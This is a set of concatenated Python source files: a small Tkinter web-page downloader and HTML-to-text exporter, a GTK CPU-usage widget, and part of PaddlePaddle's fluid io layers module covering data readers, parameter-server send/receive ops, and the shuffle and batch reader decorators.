check_btn = Checkbutton(export_frame, text="combined", variable=self.__enabled_combined, state='disabled')
check_btn.select()
check_btn.pack(side=RIGHT)
export_frame.pack()
self.__setup_log_frame(root)
root.mainloop()
def __update_logs(self, logs, _):
self.__logs_var.set(logs)
class Html2Text:
def __init__(self, base_dir, combined, log_util):
self.__base_dir = base_dir
self.__contents = os.listdir(base_dir)
self.__contents.sort()
self.__combined = combined
self.__log_util = log_util
def export2text(self):
task_thread = threading.Thread(target=self.__export2text)
task_thread.setDaemon(True)
task_thread.start()
def __export2text(self):
self.__log_util.append('start export')
combined_f = None
if self.__combined:
combined_f = open(self.__base_dir + '/' + 'html2text.txt', 'a')
for file_name in self.__contents:
if not ('htm' in file_name.split('.')[-1]):
continue
self.__log_util.append('export %s' % file_name)
html_f = open(self.__base_dir + '/' + file_name, 'rb')
html = html_f.read()
html_f.close()
charset = chardet.detect(html)['encoding']
if (charset is None) or (charset is 'GB2312'):
"""
注意⚠️
chardet会有几率把GB18030识别为GB2312
如果未识别,可使用其它工具识别,然后自行修改
"""
charset = 'GB18030'
clean_text = html2text.html2text(html.decode(charset))
combined_f.write(clean_text)
combined_f.close()
self.__log_util.append('finished!!!')
class LogUtils:
def __init__(self, callback=None):
self.__logs = []
self.__callback = callback
def set_callback(self, callback):
self.__callback = callback
def append(self, log_msg):
self.__logs.append(log_msg)
if self.__callback is not None:
self.__callback(self.__logs, log_msg)
def get_logs(self):
return self.__logs
def clear(self):
self.__logs.clear()
if self.__callback is not None:
self.__callback(self.__logs, None)
class Spider:
def __init__(self, site_url, write_path, log_util):
self.__siteURL = site_url
self.__write_path = write_path
self.__contents = []
self.__log_util = log_util
def start_download(self):
if len(self.__siteURL) == 0:
return
if not os.path.exists(self.__write_path):
os.mkdir(self.__write_path)
task_thread = threading.Thread(target=self.__downloading)
task_thread.setDaemon(TRUE)
task_thread.start()
def __downloading(self):
contents = self.__get_contents()
for item in contents:
try:
self.__save_files(item.decode('utf-8'), item.decode('utf-8').split('/')[-1])
except UnicodeDecodeError as e:
self.__log_util.append(str(e))
self.__log_util.append('download successful!!!')
def __get_contents(self):
page = self.__get_page()
pattern = re.compile(b'<a(.+?)href="(.+?)"', re.S)
items = re.findall(pattern, page)
for item in items:
self.__contents.append(item[1])
return self.__contents
def __save_files(self, file_url, filename):
file_path = self.__write_path + filename
if '.html' in file_url or '.htm' in file_url:
if 'http' not in file_url:
new_file_url = file_url
if '/' in file_url:
new_file_url = file_url.split('/')[-1]
if 'htm' in self.__siteURL[-1:4]:
last_slash_index = self.__siteURL.index(self.__siteURL.split('/')[-1])
file_url = self.__siteURL[0:last_slash_index] + new_file_url
else:
if self.__siteURL[-1] is not '/':
file_url = self.__siteURL + '/' + new_file_url
else:
file_url = self.__siteURL + new_file_url
try:
u = urllib.request.urlopen(file_url)
data = u.read()
f = open(file_path, 'wb')
f.write(data)
f.close()
self.__log_util.append('the url is %s, write path is %s' % (file_url, file_path))
except(urllib.error.HTTPError, urllib.error.URLError, IOError) as e:
self.__log_util.append(str(e))
def __get_page(self):
headers = {
'User': 'Agent: Mozilla / 5.0(X11;Ubuntu;Linux x86_64;rv: 57.0) Gecko / 20100101Firefox / 57.0',
'Accept': 'text / html, application / xhtml + xml, application / xml'
}
request = urllib.request.Request(self.__siteURL, headers=headers)
response = urllib.request.urlopen(request)
return response.read()
@staticmethod
def format_file_path(site_url, base_dir):
if len(base_dir) == 0:
return os.getcwd()
return base_dir + '/' + site_url.split('/')[2] + '/'
if __name__ == '__main__':
DownloadTools()
|
CpuUsage.py
|
import os, sys
parentPath = os.path.abspath("..")
if parentPath not in sys.path:
sys.path.insert(0, parentPath)
from widgets.Label import Label
from widgets.Image import Image
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, Gdk
import datetime
import psutil
import time
import threading
class CpuUsage(Label):
def __init__(self, bgColor='#ffffff', fgColor='#000000', fmt='%s', percpu=True, delay=1,
fontSize=10, font="", decoratePos="DOWN", decoreateImg=""):
super().__init__(bgColor, fgColor, fontSize=fontSize, font=font, decoratePos=decoratePos, decoreateImg=decoreateImg)
self.percpu = percpu
self.fmt =fmt
self.text=self.newText=""
self.delay = delay
th = threading.Thread(target=self.UpdateThread)
th.daemon = True
th.start()
def UpdateThread(self):
while True:
self.data = psutil.cpu_percent(interval=1, percpu=self.percpu)
res = ""
if self.percpu:
for core in self.data:
res += self.fmt % (core)
else:
res += self.fmt % (self.data)
self.newText = res
time.sleep(self.delay)
def Update(self):
if self.text != self.newText:
self.text = self.newText
self.SetText()
return True
def SetText(self):
txt = '<span font="%s">%s</span>' % (str(self.fontSize), self.text)
self.label.set_markup(txt)
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle would only use :code:`shape` to infer the shapes of
following variables in the network during compile-time. During run-time,
paddle would not check whether the shape of the feeded data matches the
:code:`shape` settings in this function.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source. More details :ref:`user_guide_use_py_reader_en` . When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regresssion example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
Works much like py_reader except that it's input is feed_list
instead of shapes, dtypes and lod_levels
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
have name suffixs to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
thread_num(None): The number of thread to read files.
Default: min(len(filenames), cpu_number).
buffer_size(None): The buffer size of reader. Default: 3 * thread_num
pass_num(int): Number of passes to run.
is_test(bool|None): Whether `open_files` used for testing or not. If it
is used for testing, the order of data generated is same as the file
order. Otherwise, it is not guaranteed the order of data is same
between every epoch. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
import paddle.fluid. as fluid
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
Output from the iterator that created by original reader will be
buffered into shuffle buffer, and then shuffled. The size of shuffle buffer
is determined by argument buf_size.
Args:
reader(callable): the original reader whose output will be shuffled.
buf_size(int): shuffle buffer size.
Returns:
callable: the new reader whose output is shuffled.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
shuffle_reader = fluid.layers.shuffle(reader=batch_reader, buffer_size=5000)
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
'batching' decoration on it. When reading with the result
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
